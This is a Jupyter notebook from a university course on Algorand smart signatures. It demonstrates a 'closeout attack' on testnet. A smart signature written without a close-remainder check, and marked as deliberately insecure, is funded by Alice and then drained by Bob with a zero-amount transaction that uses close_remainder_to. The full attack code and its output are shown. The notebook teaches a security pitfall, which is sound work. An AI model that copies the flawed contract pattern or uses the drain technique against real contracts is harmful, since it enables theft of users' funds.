# Smart signatures – Closeout attack
#### 06.1 Writing Smart Contracts
##### Peter Gruber (peter.gruber@usi.ch)
2022-01-12

* Write and deploy smart Signatures

## Setup
See notebook 04.1, the lines below will always automatically load functions in `algo_util.py`, the five accounts and the Purestake credentials

In [34]:
# Loading shared code and credentials
import sys, os

codepath = '..'+os.path.sep+'..'+os.path.sep+'sharedCode'
sys.path.append(codepath)
from algo_util import *
cred = load_credentials()

# Shortcuts to directly access the 3 main accounts
MyAlgo  = cred['MyAlgo']
Alice   = cred['Alice']
Bob     = cred['Bob']
Charlie = cred['Charlie']
Dina    = cred['Dina']

In [35]:
from algosdk import account, mnemonic
from algosdk.v2client import algod
from algosdk import transaction
from algosdk.transaction import PaymentTxn
from algosdk.transaction import AssetConfigTxn, AssetTransferTxn, AssetFreezeTxn
from algosdk.transaction import LogicSig, LogicSigTransaction

import algosdk.error
import json
import base64
import hashlib

In [36]:
from pyteal import *

In [37]:
# Initialize the algod client (Testnet or Mainnet)
algod_client = algod.AlgodClient(algod_token='', algod_address=cred['algod_test'], headers=cred['purestake_token'])
algod_client.status()["last-round"]

27685711

In [38]:
print(Alice['public'])
print(Bob['public'])
print(Charlie['public'])

VK6CCXY4IFHIJAVMRVS543LJQEQKOJO6YQ4DZNV3D2XJI4ETYBN5354EQU
CPUT3Z5CI3XOIZ4ARSGUFQD7V4YGYJW5BFAZMXX5YOV4KJCKI6MBCDY5XM
BY5K2AYO7R3G66ICY6SJ2JFVLRMIX677EAEEKDBTJZGP6Q4JVNZRDXDBKA


## Clearing out Modesty – Closeout attack

##### Step 1: The programmer writes down the conditions as a PyTeal program

In [39]:
max_amount = Int(int(1*1E6))                         # <---- 1e6 micro Algos = 1 Algo

modest_pyteal = And (
    Txn.receiver() == Addr(Bob["public"]),           # Receipient must be Bob
    Txn.amount() <= max_amount,                      # Requested amount must be smaller than max_amount
    Int(1) == Int(1)
)

# Security missing ... do not copy-paste

##### Step 2: Compile PyTeal -> Teal

In [40]:
modest_teal = compileTeal(modest_pyteal, Mode.Signature, version=8)
print(modest_teal)

#pragma version 8
txn Receiver
addr CPUT3Z5CI3XOIZ4ARSGUFQD7V4YGYJW5BFAZMXX5YOV4KJCKI6MBCDY5XM
==
txn Amount
int 1000000
<=
&&
int 1
int 1
==
&&
return


##### Step 3: Compile Teal -> Bytecode for AVM

In [41]:
Modest = algod_client.compile(modest_teal)
Modest

{'hash': 'PCSON4AN5TSXJRHKYLZGHYWH7YI5XO7FNMQRUW7MEYUR6A5LPX6LNJJMNM',
 'result': 'CCABATEHgCAT6T3nokbu5GeAjI1CwH+vMGwm3QlBll79w6vFJEpHmBIxCIHAhD0OECIiEhBD'}

##### Step 4: Alice funds and deploys the smart signature

In [42]:
# Step 1: prepare transaction
sp = algod_client.suggested_params()
amt = int(2.2*1e6)
txn = transaction.PaymentTxn(sender=Alice['public'], sp=sp, receiver=Modest['hash'], amt=amt)

# Step 2+3: sign and sen
stxn = txn.sign(Alice['private'])
txid = algod_client.send_transaction(stxn)

# Step 4: wait for confirmation
txinfo = wait_for_confirmation(algod_client, txid)

Current round is  27685713.
Waiting for round 27685713 to finish.
Waiting for round 27685714 to finish.
Transaction XF4I4TIVLYGMZIPGS5A5MFU7QDSA5AY7E3WQOMDFRJAZWL3IGGDA confirmed in round 27685715.


##### Step 5: Alice informs Bob

In [43]:
print("Alice communicates to Bob the following")
print("Compiled smart signature:", Modest['result'])
print("Address of smart signature: ", Modest['hash'])

Alice communicates to Bob the following
Compiled smart signature: CCABATEHgCAT6T3nokbu5GeAjI1CwH+vMGwm3QlBll79w6vFJEpHmBIxCIHAhD0OECIiEhBD
Address of smart signature:  PCSON4AN5TSXJRHKYLZGHYWH7YI5XO7FNMQRUW7MEYUR6A5LPX6LNJJMNM


#### Step 6: Bob steals everything with one malicious transaction
* Closeout is a lesser known element of the PaymentTxn
* Used to close and account and get back the minimum holding

In [44]:
# Step 1: prepare TX
sp = algod_client.suggested_params()
withdrawal_amt = int(0*1e6)                                     # <---------- withdraw zero!
txn = PaymentTxn(sender=Modest['hash'], sp=sp, 
                 receiver=Bob['public'], amt=withdrawal_amt,
                 close_remainder_to=Bob['public'])              # <---------- this is the attack!

# Step 2: sign TX <---- This step is different!
encodedProg = Modest['result'].encode()
program = base64.decodebytes(encodedProg)
lsig = LogicSig(program)
stxn = LogicSigTransaction(txn, lsig)

# Step 3: send
txid = algod_client.send_transaction(stxn)

# Step 4: wait for confirmation
txinfo = wait_for_confirmation(algod_client, txid)

Current round is  27685714.
Waiting for round 27685714 to finish.
Waiting for round 27685715 to finish.
Waiting for round 27685716 to finish.
Transaction VGVEYATED7A7IWGSKJCPBREDROLSDPJ5Q6PEIAH6MIKP2FGTP4TA confirmed in round 27685717.


In [45]:
# Check on Algoexplorer or directly
print('https://testnet.algoexplorer.io/address/'+ Modest['hash'])
print('https://testnet.algoexplorer.io/address/'+ Bob['public'])
print(algod_client.account_info(Modest['hash'])['amount'])
print(algod_client.account_info(Bob['public'])['amount'])

https://testnet.algoexplorer.io/address/PCSON4AN5TSXJRHKYLZGHYWH7YI5XO7FNMQRUW7MEYUR6A5LPX6LNJJMNM
https://testnet.algoexplorer.io/address/CPUT3Z5CI3XOIZ4ARSGUFQD7V4YGYJW5BFAZMXX5YOV4KJCKI6MBCDY5XM
0
66816907
